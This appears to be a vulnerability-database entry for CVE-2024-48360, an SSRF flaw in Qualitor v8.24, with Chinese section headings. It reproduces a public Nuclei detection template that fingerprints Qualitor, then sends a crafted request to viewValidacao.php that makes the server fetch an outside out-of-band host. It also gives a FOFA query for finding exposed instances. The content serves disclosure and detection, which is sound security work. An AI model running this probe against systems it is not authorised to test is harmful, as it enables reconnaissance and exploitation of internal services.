漏洞描述
Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.
CVE-2024-48360: Qualitor <= v8.24 - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2024-48360
info:
name: Qualitor <= v8.24 - Server-Side Request Forgery
author: s4e-io
severity: high
description: |
Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.
reference:
- https://github.com/OpenXP-Research/CVE-2024-48360
- https://packetstormsecurity.com/files/182427/Qualitor-8.24-Server-Side-Request-Forgery.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-48360
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-48360
cwe-id: CWE-918
epss-score: 0.83629
epss-percentile: 0.99247
metadata:
verified: true
max-request: 2
vendor: qualitor
product: qualitor
fofa-query: icon_hash="-1217039701"
tags: cve,cve2024,ssrf,qualitor
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "qualitor")'
- "status_code == 200"
condition: and
internal: true
- raw:
- |
GET /html/ad/adformmobile/request/viewValidacao.php?url=oast.me HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<h1> Interactsh Server </h1>"
- type: status
status:
- 200
# digest: 4a0a0047304502200702cb081e51eb7dc647ded1e876aa1ab711b0b93a53a84fdcc2d3d31c5ba69b022100fb246fa08fe5ffaa0f143b65ea10cb22fb142713f2d113fc4e9833e293964557:922c64590222798bb761d5b6d8e72950